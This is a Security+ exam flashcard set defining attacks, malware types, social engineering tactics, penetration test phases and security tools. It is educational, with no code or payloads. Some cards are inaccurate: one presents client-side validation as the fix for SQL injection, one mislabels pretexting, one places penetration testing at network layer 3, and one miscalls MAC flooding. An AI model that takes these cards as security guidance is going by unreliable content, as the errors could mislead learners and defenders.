Security+ Prep 1
logic bomb
A ___ is malware that lies dormant until triggered.
botnet
A ____ is a collection of zombie computers that are controlled from a central control infrastructure to propagate spam or to collect usernames and passwords to access secure information
pass-the-hash attack
A ____ is a hacking technique where an attacker uses an underlying NTLM or hash of a user's password to gain access to a server without ever using the actual plaintext password.
scope of work
A ____ is a very detailed document that defines exactly what is going to be included in the penetration test. This document is also referred to as the statement of work.
relay attack
A ____ occurs when an attacker can capture NFC data in transit and use the information to masquerade as the original device.
Remote Access Trojan (RAT)
A ____ provides a backdoor for an attacker to remotely control a computer with administrative control. The other types of malware could be used in conjunction with a RAT, but they do not provide the remote control access.
Trojan Horse
A _____ is a malicious program that is disguised as legitimate software.
SMB
A file is automatically unencrypted when you copy it over a network using the ___Protocol.
re-run the vulnerability scan to verify that everything has been fixed and that additional issues are not present.
After fixing an identified vulnerability, you should....
DES and AES
Both ___ and ___ are symmetric encryption algorithms. DES is weaker than AES.
Availability percentage = uptime/uptime + downtime.
Formula for calculating availability percentages.
Messages from specific senders Email containing threats (such as false links) Messages containing specific content
Gateway email spam filters can be used to block the following:
Impersonation. It is pretending to be somebody else and approaching a target to extract information.
Having a legitimate reason for approaching someone to ask for sensitive information is called what?
maintaining access
Once a penetration tester has gained access, ___ becomes the next priority. This can be done by installing backdoors, rootkits, or Trojans.
shoulder surfing, eavesdropping, USB and keyloggers, spam and spim, and hoaxes.
Social engineering attacks include ____
trusting nature of individuals
Social engineering relies on the___ to take an action or allow an unauthorized action.
moral obligation, innate human trust, threatening, an easy reward, and ignorance.
Social engineers are master manipulators. Some of the most popular tactics they use are ____
white team
The ____ members are the referees of cybersecurity. This team is responsible for managing the engagement between the red and blue teams. This group typically consists of the managers or team leads.
Input chain
The ____ would be where you would place the rule as it is used for inbound connections.
tracert
The ___command shows the path a packet takes to reach its destination. This is not the best tool to check for connectivity between two network devices.
remote server
The best protection is to save log files to a ___. In this way, compromise of a system does not provide access to the log files for that system.
Network Layer (3)
The installation and configuration of switches and routers, the implementation of VLANs, penetration testing, and virtualization are implemented at the ____.
port scanner
Use a ____ to check for open ports on a system or firewall. Compare the list of open ports with the list of ports allowed by your network design and security policy. Typically, a port is open when a service starts or is configured on a device. Open ports for unused services expose the server to attacks directed at that port.
vulnerability scanner
Use a ____ to gather information about systems such as the applications or services running on a system. A ____ often combines functions found in other tools and can perform additional functions, such as identifying open firewall ports, missing patches, and default or blank passwords.
Tarpit
When using ____, the connection between hosts is kept alive while the application data itself is silently dropped. This makes it appear to both hosts that the other host is receiving the data but is not responding. Some malicious applications notice they are being blocked and circumvent the issue. Using tarpit prevents the application from realizing it has been blocked and stops it from circumventing security controls.
Active attacks
___ are when perpetrators attempt to compromise or affect the operations of a system in some way. For example, trying to brute-force the root password on a web server is considered an ____. A distributed denial-of-service (DDoS) attack is also an ____.
Password Authentication Protocol (PAP)
___ is considered unsecure because it transmits password information in cleartext. Anyone who sniffs PAP traffic from a network can view the password information from a ___ packet with a simple traffic analyzer.
Wired Equivalent Privacy (WEP)
___ is extremely vulnerable to initialization vector (IV) attacks because it reuses the IVs. This makes it easy for attackers to crack them and compromise the encryption.
Reconnaissance
___ is the only step of a security assessment (penetration test) that is passive.
Enumeration
___ is the second phase in the penetration testing process. The penetration tester uses scanning techniques to extract information such as usernames and computer names.
Group Policy
___ is used to define security policies on a Windows operating system.
Fileless viruses
___ operate only in memory to avoid detection by traditional endpoint security solutions that are focused on matching signatures to files that have been written to the hard drive.
Phishing
___ tricks victims into providing confidential information, such as identity information or logon credentials, through emails or websites that impersonate an online entity that the victim trusts. These entities could include a financial institution or well-known e-commerce site. Phishing is a specific form of social engineering.
ARP spoofing/poisoning
____ associates the attacker's MAC address with the IP address of the victim. Address Resolution Protocol (ARP) poisoning is when an attacker sends fake ARP messages to link their MAC address with the IP address of a legitimate computer or server on the network. Once their MAC address is linked to an authentic IP address, the attacker can receive any messages directed to the legitimate address. As a result, the attacker can intercept, modify, or block communications to the legitimate MAC address.
Instant messaging applications
____ can be a vehicle for malware and virus delivery as well as social engineering exploits.
Cyber terrorists
____ generally use the internet to carry out terrorist activities such as disrupting network-dependent institutions
Active RFID tags
____ have onboard batteries and can send signals over a long distance. Road toll passes and other types of passes use active RFID.
Spim
____ is a malicious link sent to the target over instant messaging. Spim is a type of spam that targets users of instant messaging services. Creating a whitelist or using an IM blocker are countermeasures that can be implemented against spim.
Vishing
____ is a social engineering attack that uses voice over IP (VoIP) to gain sensitive information. The term is a combination of voice and phishing.
Real-time communication
____ is a strength of instant messaging clients.
Cross-site scripting (XSS)
____ is an attack that injects scripts into web pages. When a user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions. Some scripts redirect users to legitimate websites, but run in the background to capture information sent to the legitimate site. Scripts can be written to read (steal) cookies that contain identity information (such as session information). Scripts can also be designed to run under the security context of the current user. For example, scripts might execute with full privileges on the local system, or the scripts might run using the credentials used on a financial website.
Open-source intelligence
____ is any data that is collected from publicly available sources. The goal is to gather as much personally identifiable information (PII) as possible on the target.
War Driving
____ is the act of searching for wireless networks (802.11) using a signal detector or a network client (such as a PDA or notebook). While the phrase war driving originated from the action of driving around a city searching for wireless networks, the name currently applies to any method of searching for wireless networks, including walking around.
Reconnaissance
____ is the first phase in the penetration testing process. This is when the penetration tester begins gathering information.
Gain access
____ is the third phase of the penetration test life cycle and uses the information gathered in earlier phases to exploit discovered vulnerabilities.
Bluesnarfing
____ is the use of a Bluetooth connection to gain unauthorized access to an existing Bluetooth connection between phones, desktops, laptops, or PDAs. Bluesnarfing allows access to view the calendar, emails, text messages, and contact lists. Many Bluetooth devices have built-in features to prevent bluesnarfing, but it is still a known vulnerability.
Preloading
____ is used to set up a target by influencing the target's thoughts, opinions, and emotions.
Dumpster diving
____ is when an attacker goes through the trash to find important information that may have accidentally been thrown away. Because there is no direct interaction with the target, dumpster diving is a form of passive reconnaissance.
Passive attacks
____ occur when perpetrators attempt to gather information without affecting the flow of that information on the network. Packet sniffing and port scanning are ___.
DNS poisoning
____ occurs when a name server receives malicious or misleading data that incorrectly maps host names and IP addresses. In a DNS poisoning attack: Incorrect DNS data is introduced into a primary DNS server. The incorrect mapping is made available to client applications through the resolver. Traffic is directed to incorrect sites.
MAC forwarding
____ overloads the switch's MAC forwarding table to make the switch function like a hub. The attacker floods the switch with packets, each containing different source MAC addresses. The flood of packets fills up the forwarding table and consumes so much of the memory in the switch that it causes the switch to enter a state called fail open mode. While in this mode, all incoming packets are broadcast out of all ports (as with a hub), instead of just to the correct ports, as per normal operation.
Peer-to-peer (P2P)
____ software allows users to share content and access content shared by other users without using centralized servers or centralized access control.
Security Orchestration, Automation, and Response (SOAR)
____ systems gather and analyze data like SIEM systems, but they take the analysis to the next level. ____is a solution stack of compatible software programs that allow an organization to collect data about security threats from multiple sources and respond to low-level security events without human assistance.
Distributing hoax virus-information emails
_____ are a social engineering attack. This type of attack preys on email recipients who are fearful and will believe most information if it is presented in a professional manner. The victims of these attacks fail to double-check the information or instructions with a reputable third-party antivirus software vendor before implementing the recommendations. Usually, these hoax messages instruct the reader to delete key system files or download Trojans.
SQL Injection Attack
_____ is an attack that infiltrates a web application by manipulating SQL statements entered into a web page. It's important to note that SQL injections are a result of flaws in web applications, not in the database, file system, or web server.
Client-side validation
_____ should have been used on the local system to identify input errors in the order form before the data was ever sent to the server. In this example, if the user entered SQL commands in an order form field, the error would have been immediately detected and blocked before the data was submitted to the server.
Pharming
____involves the attacker executing malicious programs on the target's computer so that any URL traffic redirects to the attacker's malicious website.
Pretexting
____is conducting research and information gathering to create convincing identities, stories, and scenarios to be used on selected targets.
MD5
____is the weakest hashing algorithm. It produces a message digest of 128 bits. The larger the message digest, the more secure the hash. SHA-1 is more secure because it produces a 160-bit message digest.
Threat feeds
provide real-time updates on cyberthreats across the world. They can provide information such as suspicious domains, known malware, known malicious IP addresses, and more.
nmap
scans networks to see what it can find in terms of hosts and open ports.
netstat -a
show all listening and non listening sockets